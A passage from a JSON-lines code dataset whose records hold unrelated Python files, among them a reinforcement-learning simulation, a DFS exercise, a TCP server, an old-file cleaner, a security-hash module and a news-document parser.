MDP(MDP_STAGES, more_control_input=MORE_CONTROL_INPUT, legacy_mode=LEGACY_MODE,\r\n task_type=TASK_TYPE)\r\n sarsa = sarsa_save\r\n forward = forward_save\r\n arb = arb_save\r\n env.reward_map = env.reward_map_copy.copy()\r\n env.output_states = env.output_states_copy.copy()\r\n cum_d_p_mb = cum_p_mb = cum_mf_rel = cum_mb_rel = cum_rpe = cum_spe = cum_reward = cum_score = 0\r\n cum_ctrl_act = np.zeros(MDP.NUM_CONTROL_ACTION)\r\n arb.episode_number = episode\r\n arb.CONTROL_resting = CONTROL_resting\r\n human_action_list_episode = []\r\n# env = MDP(2, more_control_input=True, legacy_mode=False, task_type=TASK_TYPE)\r\n# env.agent_comm_controller.register('model-based', forward)\r\n for trial in range(TRIALS_PER_EPISODE):\r\n block_indx = trial // int(TRIALS_PER_EPISODE / 4)\r\n if trial % TRIALS_PER_EPISODE == 0:\r\n if episode > CONTROL_resting:\r\n env = MDP(MDP_STAGES, more_control_input=MORE_CONTROL_INPUT, legacy_mode=LEGACY_MODE,\r\n task_type=TASK_TYPE)\r\n env.reward_map = env.reward_map_copy.copy()\r\n env.output_states = env.output_states_copy.copy()\r\n if episode <= CONTROL_resting:\r\n env = MDP(MDP_STAGES, more_control_input=MORE_CONTROL_INPUT, legacy_mode=LEGACY_MODE,\r\n task_type=TASK_TYPE)\r\n env.bwd_idf = -1\r\n t_d_p_mb = t_p_mb = t_mf_rel = t_mb_rel = t_rpe = t_spe = t_reward = t_score = 0\r\n game_terminate = False\r\n human_obs, control_obs_frag = env.reset()\r\n #control_obs = np.append(control_obs_frag, [10, 0.5])\r\n if episode > CONTROL_resting:\r\n \"\"\"control agent choose action\"\"\"\r\n control_action = int(opt_pol[opt_index * TRIALS_PER_EPISODE - TRIALS_PER_EPISODE+ trial])\r\n else:\r\n control_action = 0\r\n cum_ctrl_act[control_action] += 1\r\n \"\"\"control act on environment\"\"\"\r\n if TASK_TYPE == 2019:\r\n if control_action == 3:\r\n if env.is_flexible == 1:\r\n arb.p_mb = 0.8\r\n arb.p_mf = 0.2\r\n else:\r\n arb.p_mb = 0.2\r\n arb.p_mf = 0.8\r\n elif TASK_TYPE == 2021:\r\n if control_action == 2:\r\n if env.is_flexible == 1:\r\n arb.p_mb = 0.8\r\n arb.p_mf = 0.2\r\n else:\r\n arb.p_mb = 0.2\r\n arb.p_mf = 0.8\r\n _, _, _, _ = env.step([MDP.CONTROL_AGENT_INDEX, control_action])\r\n\r\n current_game_step = 0\r\n\r\n while not game_terminate:\r\n \"\"\"human choose action\"\"\"\r\n if episode < CONTROL_resting:\r\n human_action = randint(0, 1)\r\n else:\r\n human_action = arb.action(sarsa.get_Q_values(human_obs), forward.get_Q_values(human_obs))\r\n #print(\"human action : \", human_action)\r\n\r\n \"\"\"human act on environment\"\"\"\r\n next_human_obs, human_reward, game_terminate, next_control_obs_frag \\\r\n = env.step((MDP.HUMAN_AGENT_INDEX, human_action))\r\n\r\n \"\"\"update human agent\"\"\"\r\n spe = forward.optimize(human_obs, human_reward, human_action, next_human_obs, env)\r\n next_human_action = arb.action(sarsa.get_Q_values(human_obs), forward.get_Q_values(next_human_obs)) # required by models like SARSA\r\n if env.is_flexible == 1: #flexible goal condition\r\n rpe = sarsa.optimize(human_reward, human_action, next_human_action, human_obs, next_human_obs)\r\n else: # specific goal condition human_reward should be normalized to sarsa\r\n if human_reward > 0: # if reward is 10, 20, 40\r\n rpe = sarsa.optimize(40, human_action, next_human_action, human_obs, next_human_obs)\r\n else:\r\n rpe = sarsa.optimize(0, human_action, next_human_action, human_obs, next_human_obs)\r\n\r\n mf_rel, mb_rel, p_mb, d_p_mb = arb.add_pe(rpe, spe)\r\n t_d_p_mb += d_p_mb\r\n t_p_mb += p_mb\r\n t_mf_rel += mf_rel\r\n t_mb_rel += mb_rel\r\n t_rpe += abs(rpe)\r\n t_spe += spe\r\n t_score += human_reward # if not the terminal state, human_reward is 0, so simply add here is fine\r\n\r\n \"\"\"iterators update\"\"\"\r\n human_obs = next_human_obs\r\n if current_game_step == 0:\r\n rpe1 = rpe\r\n else:\r\n rpe2 = rpe\r\n current_game_step += 1\r\n\r\n # calculation after one trial\r\n d_p_mb, p_mb, mf_rel, mb_rel, rpe, spe = list(map(lambda x: x / 2, [\r\n t_d_p_mb, t_p_mb, t_mf_rel, t_mb_rel, t_rpe, t_spe])) # map to average value\r\n cum_d_p_mb += d_p_mb\r\n cum_p_mb += p_mb\r\n cum_mf_rel += mf_rel\r\n cum_mb_rel += mb_rel\r\n cum_rpe += rpe\r\n cum_spe += spe\r\n cum_score += t_score\r\n\r\n \"\"\"update control agent\"\"\"\r\n t_reward = error_to_reward((rpe, spe, mf_rel, mb_rel), p_mb, CONTROL_MODE)\r\n cum_reward += t_reward\r\n #next_control_obs = np.append(next_control_obs_frag, [rpe, spe])\r\n\r\n #control_obs_extra = [rpe, spe]\r\n PMB_shuffle[affected_sbj_indx][episode*TRIALS_PER_EPISODE+trial]=p_mb\r\n RPE_shuffle[affected_sbj_indx][episode*TRIALS_PER_EPISODE+trial]=rpe\r\n SPE_shuffle[affected_sbj_indx][episode * TRIALS_PER_EPISODE + trial] = spe\r\n Reward_shuffle[affected_sbj_indx][episode * TRIALS_PER_EPISODE + trial] = t_reward\r\n Score_shuffle[affected_sbj_indx][episode * TRIALS_PER_EPISODE + trial] = t_score\r\n\r\n\r\n if episode == CONTROL_resting - 1:\r\n arb_save = arb\r\n sarsa_save = sarsa\r\n forward_save = forward\r\n\r\n save_pol_list = ['max-spe','min-spe','max-rpe','min-rpe','min-rpe-min-spe','max-rpe-max-spe','min-rpe-max-spe','max-rpe-min-spe']\r\n save_file_head = 'history_results/SUB{0:03d}_SHUFFLE_'.format(policy_sbj_indx) + save_pol_list[pol_list.index(CONTROL_MODE)]+file_suffix\r\n np.save(save_file_head+'_PMB.npy',PMB_shuffle)\r\n np.save(save_file_head+'_RPE.npy',RPE_shuffle)\r\n np.save(save_file_head + '_SPE.npy', SPE_shuffle)\r\n np.save(save_file_head+'_RWD.npy',Reward_shuffle)\r\n np.save(save_file_head + '_SCR.npy', Score_shuffle)\r\n\r\n\r\nif __name__ == '__main__':\r\n short_opt = \"hdn:\"\r\n long_opt = [\"policy-sbj=\",\"ctrl-mode=\",\"task-type=\",'file-suffix=']\r\n try:\r\n opts, args = getopt.getopt(sys.argv[1:], short_opt, long_opt)\r\n except getopt.GetoptError as err:\r\n print(err)\r\n sys.exit(2)\r\n for o, a in opts:\r\n if o == \"--policy-sbj\":\r\n policy_sbj_indx = int(a)\r\n elif o == \"--ctrl-mode\":\r\n CONTROL_MODE = a\r\n elif o == \"--task-type\":\r\n TASK_TYPE = int(a)\r\n elif o == \"--file-suffix\":\r\n file_suffix = a\r\n print(file_suffix)\r\n elif o == \"--MF_ONLY\":\r\n MF_ONLY = bool(a)\r\n elif o == \"--MB_ONLY\":\r\n MB_ONLY = bool(a)\r\n elif o == \"--file-suffix\":\r\n FILE_SUFFIX = a\r\n else:\r\n assert False, \"unhandled option\"\r\n\r\n shuffle_simulation(CONTROL_MODE = CONTROL_MODE, policy_sbj_indx = policy_sbj_indx)\r\n","sub_path":"shuffle_simulation.py","file_name":"shuffle_simulation.py","file_ext":"py","file_size_in_byte":17133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"561439716","text":"import sys\nsys.stdin=open('danG.txt', 'r')\n\n\ndef dfs(a, b):\n global cnt, num, rocol\n base[a][b] = cnt\n num += 1\n for dir in range(4):\n aa = a+dy[dir]\n bb = b+dx[dir]\n if -1 < aa < rocol and -1 < bb < rocol:\n if base[aa][bb] == 1:\n dfs(aa, bb)\n\n\ndy = [-1, 1, 0, 0]\ndx = [0, 0, -1, 1]\nrocol = int(input())\nbase = [0]*rocol\ncnt = 1\nnum = 0\nnum_list = []\nfor i in range(rocol):\n base[i] = list(map(int, input()))\nfor ii in range(rocol):\n for jj in range(rocol):\n if base[ii][jj] == 1:\n cnt += 1\n dfs(ii, jj)\n num_list.append(num)\n num = 0\nprint(cnt-1)\nnum_list.sort()\nfor nn in range(len(num_list)):\n print(num_list[nn])","sub_path":"algorithm_practice/s2s3_ad_study/dfsbfs/2667_danG.py","file_name":"2667_danG.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"392503240","text":"#!/usr/bin/python3\n\"\"\"task 0\"\"\"\nimport requests\nimport sys\nif __name__ == '__main__':\n if len(sys.argv) == 2 and sys.argv[1].isdigit():\n arg = sys.argv[1]\n res1 = requests.get('https://jsonplaceholder.typicode.com/todos')\n res2 = requests.get('https://jsonplaceholder.typicode.com/users')\n s = res1.json()\n usr = res2.json()\n for y in usr:\n if y['id'] == int(arg):\n user = y['name']\n Max = 0\n Done = 0\n titles = []\n for i in s:\n for key, value in i.items():\n if key == 'userId' and value == int(arg):\n Max += 1\n for key, value in i.items():\n if key == 'completed' and value is True:\n Done += 1\n titles.append(i['title'])\n print('Employee {} is done with tasks({}/{}):'.format(user, Done, Max))\n for i in titles:\n print('\\t {}'.format(i))\n","sub_path":"0x15-api/0-gather_data_from_an_API.py","file_name":"0-gather_data_from_an_API.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"484958553","text":"import time\nimport socket\nimport threading\nimport selectors\nfrom ANETTEST.AutoNET.Socket._Tool import get_my_ip, get_socket_buffer_size\nfrom ANETTEST.AutoNET.Socket._decode import cut_message_by_head, get_data_len, decode_message\nfrom ANETTEST.AutoNET.Socket._decode import LEN_TOTAL, build_tx_message\n\n\nclass TcpServer(object):\n\n def __init__(self, recv_cb, event_cb, error_cb, port, rx_length=256, launch_delay=0):\n # CALLBACK\n self._recv_cb = recv_cb\n self._event_cb = event_cb\n self._error_cb = error_cb\n # TCP\n self._select = None\n self._tcp = None\n self._is_bound = False\n self._port = port\n self._clients = dict() # {socket_conn: '10.10.10.10'}\n self._rx_length = rx_length\n self._rx_buffer = bytes()\n # Thread\n self._thread = threading.Thread(target=self._working)\n self._thread_interval = 2\n self._thread.daemon = True\n self._thread_delay = launch_delay\n self._thread.start()\n\n def _working(self):\n time.sleep(self._thread_delay)\n self._tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1) # SO_REUSEADDR, SO_REUSEPORT\n self._tcp.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, get_socket_buffer_size())\n self._tcp.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, get_socket_buffer_size())\n self._select = selectors.DefaultSelector()\n self._select.register(self._tcp, selectors.EVENT_READ, self._accept)\n while 1:\n if self._is_bound:\n events = self._select.select(timeout=self._thread_interval)\n for key, mask in events:\n callback = key.data\n callback(key.fileobj)\n else:\n host_ip = self.get_my_ip()\n if host_ip:\n try:\n self._tcp.bind((host_ip, self._port))\n self._tcp.listen()\n self._is_bound = True\n except socket.error as err:\n self._error_cb(module='ANET_TCP', code='BIND', value=err)\n time.sleep(self._thread_interval)\n self._event_cb(module='ANET_TCP', code='BIND', value=(self._is_bound, (host_ip, self._port)))\n else:\n print('[ERROR] ANET_SERVER: Network is unreachable')\n\n def _recv_length(self, conn, rx_length):\n rx_msg = bytes()\n try:\n msg = conn.recv(rx_length)\n if msg:\n rx_msg += msg\n else:\n self._client_lost(conn=conn)\n except (BlockingIOError, socket.timeout, OSError) as err:\n print(' BlockingIOError', err)\n except (ConnectionResetError, ConnectionAbortedError) as err:\n print(' ConnectionResetError', err)\n self._client_lost(conn=conn)\n return rx_msg\n\n def _recv(self, conn):\n # RX ONE MESSAGE\n self._rx_buffer += self._recv_length(conn=conn, rx_length=self._rx_length)\n while self._rx_buffer:\n # CUT_TO_HEAD\n msg_with_head = cut_message_by_head(buffer=self._rx_buffer)\n if not msg_with_head:\n break\n # GET_DATA_LEN\n data_len, miss_len = get_data_len(msg_with_head=msg_with_head)\n if miss_len > 0: # MISS_DATA\n new_buffer = self._recv_length(conn=conn, rx_length=miss_len)\n if new_buffer:\n self._rx_buffer += new_buffer\n else:\n break\n else: # PARSE_DATA\n data, self._rx_buffer, error = decode_message(msg_with_head=msg_with_head, data_len=data_len)\n if data:\n self._recv_cb(rx_msg=data, ip=self._clients[conn])\n if error:\n self._error_cb(module='ANET_TCP', code=error, value=self._rx_buffer)\n\n def _conn_send(self, conn, data: bytes):\n bytes_sent = 0\n try:\n msg, msg_len = build_tx_message(data=data)\n bytes_sent = conn.send(msg)\n if bytes_sent != msg_len:\n print('[ERROR], TCP_TX', f'{bytes_sent}/{len(msg)}', msg)\n self._error_cb(module='ANET_TCP', code='TX_BUF_OVERFLOW', value=msg)\n bytes_sent -= LEN_TOTAL\n except (BlockingIOError, socket.timeout, OSError) as err:\n pass\n except (ConnectionResetError, ConnectionAbortedError) as err:\n self._error_cb(module='ANET_TCP', code='SEND', value=err)\n self._client_lost(conn)\n return bytes_sent\n\n # SEND\n def send_to(self, data, ip):\n bytes_sent = 0\n if ip in self._clients.values():\n conn = list(self._clients.keys())[list(self._clients.values()).index(ip)]\n bytes_sent = self._conn_send(conn, data)\n return bytes_sent\n\n def send_broadcast(self, data):\n arrived_clients_ip = list()\n if self._clients:\n for conn in list(self._clients.keys()):\n bytes_sent = self._conn_send(conn, data)\n if bytes_sent:\n arrived_clients_ip.append(self._clients[conn])\n return arrived_clients_ip\n\n # ACCEPT / LOST\n def _accept(self, sock):\n conn, addr = sock.accept()\n ip, port = addr\n self._clients[conn] = ip\n self._select.register(conn, selectors.EVENT_READ, self._recv)\n self._event_cb(module='ANET_TCP', code='CONNECT', value=(True, (ip, self._port)))\n\n def _client_lost(self, conn):\n if conn in self._select.get_map():\n self._select.unregister(conn)\n if conn in self._clients:\n ip = self._clients[conn]\n conn.close()\n self._clients.pop(conn)\n self._event_cb(module='ANET_TCP', code='CONNECT', value=(False, (ip, self._port)))\n\n # FUNC\n def is_bound(self):\n return self.is_bound\n\n def get_client_ips(self):\n return list(self._clients.values())\n\n def is_connected(self):\n return True if list(self._clients.values()) else False\n\n def disconnect_all(self):\n for conn in list(self._clients.keys()):\n self._client_lost(conn=conn)\n\n @staticmethod\n def get_my_ip():\n return get_my_ip()\n\n def get_server_port(self):\n return self._port\n\n def exit(self):\n self._tcp.close()\n\n\nif __name__ == '__main__':\n\n def recv_cb_(rx_msg, ip):\n print(f'TCP_RX: {rx_msg} ({ip})')\n\n def event_cb_(module, code, value):\n print(f'EVENT_RX: {module} {code} {value}')\n\n def error_cb_(module, code, value):\n print(f'ERROR: {module} {code} {value}')\n\n SER_PORT = 10001\n\n server = TcpServer(recv_cb_, event_cb_, error_cb_, port=SER_PORT)\n print('MY_IP=', server.get_my_ip())\n while 1:\n time.sleep(2)\n server.send_broadcast(b'message from server')\n","sub_path":"ANETTEST/AutoNET/Socket/TcpServer.py","file_name":"TcpServer.py","file_ext":"py","file_size_in_byte":7024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"230589731","text":"from threading import Timer, Thread\nfrom functools import partial\nfrom os import remove, path, stat, walk\nfrom platform import system\nfrom time import time\n\n\ndef get_file_creation_date(filepath: str) -> str:\n if system() == \"Windows\":\n return path.getctime(filepath)\n else:\n meta = stat(filepath)\n try:\n return meta.st_birthtime\n except AttributeError:\n return meta.st_mtime\n\n\ndef get_all_files_in_dir(dir: str) -> list:\n filepaths = []\n\n for pack in walk(dir):\n for f in pack[2]:\n filepaths.append(f)\n\n return filepaths\n\n\ndef del_old_files_in_dir(path: str, age: int = 0):\n def _del_old_files_in_dir(path: str, age: int = 0):\n filepaths = get_all_files_in_dir()\n\n for filepath in filepaths:\n crt_time = get_file_creation_date(filepath)\n if time() - crt_time > age:\n Thread(target=remove, args=[filepath]).start()\n\n Thread(target=_del_old_files_in_dir, args=[path, age]).start()\n\n\ndef del_old_files_in_dir_periodic(interval: int, path: str, age: int = 0):\n Timer(interval, partial(del_old_files_in_dir, age, path)).start()\n","sub_path":"wb/utils/cleaner.py","file_name":"cleaner.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"325257381","text":"# 3.6 Установка дополнительных модулей\n\n\"\"\"\nИмеется набор файлов, каждый из которых, кроме последнего, содержит имя следующего файла.\nПервое слово в тексте последнего файла: \"We\".\n\nСкачайте предложенный файл. В нём содержится ссылка на первый файл из этого набора.\n\nВсе файлы располагаются в каталоге по адресу:\nhttps://stepic.org/media/attachments/course67/3.6.3/\n\nЗагрузите содержимое последнего файла из набора, как ответ на это задание.\n\"\"\"\n\nimport requests\n\nurl = 'https://stepic.org/media/attachments/course67/3.6.3/699991.txt'\nwhile True:\n r = requests.get(url)\n t = r.text.split()\n if t[0] == 'We':\n with open('D:\\Python\\dataset_3378_result.txt', 'w', encoding='utf-8') as inf:\n inf.write(r.text)\n break\n else:\n url = 'https://stepic.org/media/attachments/course67/3.6.3/' + r.text","sub_path":"3/3.6.3.py","file_name":"3.6.3.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"78596048","text":"'''\n\n'''\n\nclass ListNode(object):\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\ndef mergeTwoLists_iteratively(l1,l2):\n dummy = cur = ListNode(0)\n while l1 and l2:\n if l1.val < l2.val:\n cur.next = l1\n l1=l1.next\n else:\n cur.next = l2\n l2=l2.next\n cur = cur.next\n cur.next = l1 or l2\n return dummy.next\n\ndef mergeTwoLists_recursively(l1, l2):\n if not l1 or not l2:\n return l1 or l2\n if l1.val< l2.val:\n print(l1.val,\" is less than \",l2.val)\n l1.next = mergeTwoLists_recursively(l1.next,l2)\n print(\"Move \",l1.val,\" to smaller between \",l1.next.val,l2.val)\n return l1\n else:\n print(l2.val,\" is less than \",l1.val)\n l2.next = mergeTwoLists_recursively(l1,l2.next)\n print(\"Move \",l2.val,\" to smaller between \",l1.val,l2.next.val)\n return l2\n\nl1 = ListNode(3,ListNode(5,ListNode(6)))\nl2 = ListNode(1,ListNode(2, ListNode(4, ListNode(7))))\nh = mergeTwoLists_iteratively(l1,l2)\nwhile h:\n print(h.val)\n h = h.next","sub_path":"GoogleTopQues/21_mergeTwoLists.py","file_name":"21_mergeTwoLists.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"454604217","text":"class Edge:\n \"\"\"\n An edge which records two centers and two adjacent corners\n \"\"\"\n def __init__(self, id, center1, center2, vertex1, vertex2, is_border):\n self.id = id\n self.d0 = center1\n self.d1 = center2\n self.v0 = vertex1\n self.v1 = vertex2\n self.is_border = is_border\n","sub_path":"cartograph/border_graph/Edge.py","file_name":"Edge.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"83948217","text":"#! /usr/bin/env python3\n\nimport functions # this imports all functions in the file functions\n\t\t\t\t # you can import this as another name if the name of the module is large or too long.\n\t\t\t\t # e.g import functions as f\n\nfrom functions_2 import preety_Print # This imports the preety_Print function only\n\t\t\t\t\t\t\t\t\t # You can also import function as\n\t\t\t\t\t\t\t\t\t # e.g from functions_2 import preety_print as p_p\n\t\t\t\t\t\t\t\t\t # you can import all functions with *\n\t\t\t\t\t\t\t\t\t # e.g from functions_2 import *\n\n\nthree_hundred = functions.add(1, 299)\nprint(three_hundred)\n\nd = {\n\t'first_name' : 'Eric',\n\t'last_name' : 'Mwamodo',\n\t'age' : 23,\n\t'location' : 'Wundanyi'\n}\n\npreety_Print(d)\n","sub_path":"Basics/10-07-2016/imports__.py","file_name":"imports__.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"446597119","text":"from flask import make_response, request, session\nfrom datetime import date, datetime, timedelta\nfrom .db import db\nimport time\nimport random\nimport string\n\nclass security :\n def __init__(self):\n self.table = 'security'\n self.valid_duration = 60 * 10\n\n def get_hash(self) :\n obj_database = db()\n security_hash = self.hash_generator()\n query = ('INSERT INTO ' + self.table + ' (security_hash, security_time, security_used) VALUES (%s, %s, %s)')\n data = (security_hash, time.strftime('%Y-%m-%d %H:%M:%S'), 0)\n\n if obj_database.insert(query, data) != False :\n return security_hash\n else :\n return False\n\n def check_hash(self, hash='') :\n obj_database = db()\n query = ('SELECT * FROM ' + self.table + ' WHERE security_hash=%s AND security_used!=%s')\n data = (hash, 1, )\n security_records = obj_database.select(query, data)\n\n if len(security_records) > 0 :\n if int(datetime.now().timestamp()) - int(datetime.timestamp(security_records[0]['security_time'])) < self.valid_duration :\n query = ('UPDATE ' + self.table + ' SET security_used=%s WHERE security_hash=%s')\n data = (1, hash)\n obj_database.update(query, data)\n\n return True\n else :\n return False\n else :\n return False\n\n def hash_generator(self) :\n letters = string.ascii_lowercase + '1234567890'\n return ''.join(random.choice(letters) for i in range(32))\n","sub_path":"src/pm_server/modules/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"355093434","text":"import os.path\nimport datetime\nimport re\nimport gzip\n\ndocNoKey = \"DOCNO\"\ndateTimeKey = \"DATE_TIME\"\ndocTypeKey = \"DOCTYPE\"\nheaderKey = \"HEADER\"\nslugKey = \"SLUG\"\ntrailerKey = \"TRAILER\"\nheadlineKey = \"HEADLINE\"\npKey = \"P\"\nbodyKey = \"BODY\"\ntextKey = \"TEXT\"\ndocKey = \"DOC\"\n\n\nclass Document:\n\tdef __init__(self):\n\t\t\"\"\"\n\t\t\tInitialize the document\n\t\t\"\"\"\n\t\tself.docNo = \"\"\n\t\tself.dateTime = \"\"\n\t\tself.header = \"\"\n\t\tself.docType = \"\"\n\t\tself.slug = \"\"\n\t\tself.headline = \"\"\n\t\tself.trailer = \"\"\n\t\tself.body = \"\"\n\t\tself.comparableDateTime = None\n\t\tself.paragraphs = []\n\n\tdef __str__(self):\n\t\t\"\"\"\n\t\t\tsimple tostring method, used for the developer to see what the object looks like (need to cleanse single quotes)\n\t\t\"\"\"\n\n\t\tparagraphText = \"\"\n\t\tfor paragraph in self.paragraphs:\n\t\t\tparagraphText += paragraph\n\n\t\treturn \"\"\"\n\t\t{\n\t\t\tdocNo: '%s',\n\t\t\tdateTime: '%s',\n\t\t\theader: '%s',\n\t\t\tslug: '%s',\n\t\t\theadline: '%s',\n\t\t\ttrailer: '%s',\n\t\t\tbody: '%s',\n\t\t\tparagraphs: '%s'\n\t\t}\n\t\t\"\"\" % (self.docNo, self.dateTime, self.header, self.slug, self.headline, self.trailer, self.body, paragraphText)\n\n\tdef getComparableDate(self):\n\t\tbeginningOfTime = datetime.datetime(1970, 1, 1)\n\n\t\ttry:\n\t\t\tbeginningOfTime = datetime.datetime.strptime(re.sub(\"\\\\s+\", \"\", self.dateTime)[0:10], \"%Y-%m-%d\")\n\t\texcept:\n\t\t\tpass\n\n\t\treturn beginningOfTime\n\n\t@staticmethod\n\tdef cleanseParagraph(paragraph):\n\t\tbeginningArticles = [\"--\", \"_\"]\n\t\taltParagraph = paragraph\n\n\t\tfor beginningArticle in beginningArticles:\n\t\t\tresult = altParagraph.find(beginningArticle, 0)\n\n\t\t\tif result > -1:\n\t\t\t\tsubStr = altParagraph[0:result]\n\t\t\t\tuppers = [l for l in subStr if l.isupper()]\n\n\t\t\t\tif float(len(uppers)) > float(len(subStr) / 2):\n\t\t\t\t\taltParagraph = altParagraph[result+len(beginningArticle):]\n\t\t\t\t\tbreak\n\n\t\treturn altParagraph\n\n\t@staticmethod\n\tdef build(objectDictionary):\n\t\t\"\"\"\n\t\t\tbuild the document object given a dictionary with string keys and array of strings values: { 'key', [ 'first', 'second' ]}\n\t\t\"\"\"\n\n\t\tnewDocument = Document()\n\n\t\tif docNoKey in objectDictionary:\n\t\t\tfor item in objectDictionary[docNoKey]:\n\t\t\t\tnewDocument.docNo += unicode(item, errors='replace')\n\n\t\tif docTypeKey in objectDictionary:\n\t\t\tfor item in objectDictionary[docTypeKey]:\n\t\t\t\tnewDocument.docType += unicode(item, errors='replace')\n\n\t\tif dateTimeKey in objectDictionary:\n\t\t\tfor item in objectDictionary[dateTimeKey]:\n\t\t\t\tnewDocument.dateTime += unicode(item, errors='replace')\n\n\t\tif headerKey in objectDictionary:\n\t\t\tfor item in objectDictionary[headerKey]:\n\t\t\t\tnewDocument.header += unicode(item, errors='replace')\n\n\t\tif slugKey in objectDictionary:\n\t\t\tfor item in objectDictionary[slugKey]:\n\t\t\t\tnewDocument.slug += unicode(item, errors='replace')\n\n\t\tif headlineKey in objectDictionary:\n\t\t\tfor item in objectDictionary[headlineKey]:\n\t\t\t\tnewDocument.headline += unicode(item, errors='replace')\n\n\t\tif trailerKey in objectDictionary:\n\t\t\tfor item in objectDictionary[trailerKey]:\n\t\t\t\tnewDocument.trailer += unicode(item, errors='replace')\n\n\t\tif pKey in objectDictionary:\n\t\t\tfor item in objectDictionary[pKey]:\n\t\t\t\tnewDocument.paragraphs.append(unicode(item, errors='replace'))\n\t\telif textKey in objectDictionary:\n\t\t\tfor item in objectDictionary[textKey]:\n\t\t\t\tnewDocument.paragraphs.append(Document.cleanseParagraph(unicode(item, errors='replace')))\n\n\t\tif bodyKey in objectDictionary:\n\t\t\tfor item in objectDictionary[bodyKey]:\n\t\t\t\tnewDocument.body += unicode(item, errors='replace')\n\n\t\treturn newDocument\n\n\t@staticmethod\n\tdef returnCharsFromDocument(filePath, seekToId):\n\t\t\"\"\"\n\t\t\treturn the characters from a document\n\t\t\"\"\"\n\t\tif filePath[-3:] == \".gz\":\n\t\t\tdocFile = gzip.open(filePath)\n\t\telse:\n\t\t\tdocFile = open(filePath, 'r')\n\n\t\tif seekToId is not None:\n\t\t\tpos = 0\n\t\t\tprevpos = 0\n\t\t\tline = \"\"\n\t\t\twhile seekToId not in line:\n\t\t\t\tprevpos = pos\n\t\t\t\tpos = docFile.tell()\n\t\t\t\tline = docFile.readline()\n\n\t\t\tif seekToId in line:\n\t\t\t\tif docNoKey in line:\n\t\t\t\t\toffset = prevpos - docFile.tell()\n\t\t\t\telse:\n\t\t\t\t\toffset = pos - docFile.tell()\n\t\t\t\tdocFile.seek(offset, 1)\n\t\t\telse:\n\t\t\t\traise IOError(\"Could not find topic \" + seekToId + \" in file \" + filePath)\n\n\t\twhile True:\n\t\t\tc = docFile.read(1)\n\n\t\t\tif not c:\n\t\t\t\treturn\n\n\t\t\tyield c\n\n\t@staticmethod\n\tdef returnCharsFromString(largeString):\n\t\t\"\"\"\n\t\t\treturn the characters from a string\n\t\t\"\"\"\n\t\tfor char in largeString:\n\t\t\tyield char\n\n\t@staticmethod\n\tdef factoryFromIndexer(documentIndexer):\n\t\tif documentIndexer == None:\n\t\t\treturn None\n\n\t\tindex = 0\n\t\tactualString = \"\"\n\t\tfor char in Document.returnCharsFromDocument(documentIndexer.fileName):\n\t\t\tif index >= documentIndexer.start and index <= documentIndexer.end:\n\t\t\t\tactualString += char\n\t\t\telif index > documentIndexer.end:\n\t\t\t\treturn Document.factory(actualString)\n\n\t\t\tindex += 1\n\n\t@staticmethod\n\tdef factoryForSpecificDocNo(inputFileName, docNo):\n\t\t\"\"\"\n\t\t\tbuild 1 document given an input and doc number\n\t\t\"\"\"\n\n\t\tcharMethod = Document.returnCharsFromDocument\n\n\t\ttagStack = []\n\t\tcurrentTag = \"\"\n\t\tcurrentObject = {}\n\n\t\tseenOpeningTag = False\n\t\tseenClosingTag = False\n\t\tseenClosingXml = False\n\t\tworkspace = \"\"\n\n\t\tfoundDocNo = False\n\n\t\tfor c in charMethod(inputFileName, docNo):\n\t\t\t# print c,\n\t\t\tif c == \"<\":\n\t\t\t\tseenOpeningTag = True\n\t\t\t\ttagStackLen = len(tagStack)\n\n\t\t\t\tif tagStackLen > 0:\n\t\t\t\t\tlastTag = tagStack[tagStackLen - 1]\n\t\t\t\t\t# check if we found the docno\n\t\t\t\t\tif lastTag == docNoKey and workspace.strip() == docNo:\n\t\t\t\t\t\tfoundDocNo = True\n\n\t\t\t\t\tif lastTag in currentObject and foundDocNo:\n\t\t\t\t\t\tcurrentObject[lastTag].append(workspace)\n\t\t\t\t\telif foundDocNo:\n\t\t\t\t\t\tcurrentObject[lastTag] = [workspace]\n\n\t\t\t\tcurrentTag = \"\"\n\t\t\t\tworkspace = \"\"\n\t\t\telif c == \"/\" and seenOpeningTag:\n\t\t\t\tseenClosingXml = True\n\t\t\telif c == \">\" and seenOpeningTag:\n\t\t\t\t# remove the last one\n\t\t\t\tif seenClosingXml and len(tagStack) > 0:\n\t\t\t\t\ttagStack.pop()\n\t\t\t\telse:\n\t\t\t\t\tif currentTag[:4] == \"DOC \" and docNo in currentTag:\n\t\t\t\t\t\tfoundDocNo = True\n\t\t\t\t\t\ttagStack.append(\"DOC\")\n\t\t\t\t\t\tcurrentObject[docNoKey] = [docNo]\n\t\t\t\t\telse:\n\t\t\t\t\t\ttagStack.append(currentTag)\n\n\t\t\t\tseenOpeningTag = False\n\t\t\t\tseenClosingXml = False\n\t\t\t\tseenClosingTag = False\n\t\t\t\tworkspace = \"\"\n\n\t\t\t\tendedXmlDoc = len(tagStack) == 0\n\t\t\t\tif endedXmlDoc and foundDocNo:\n\t\t\t\t\treturn Document.build(currentObject)\n\t\t\t\telif 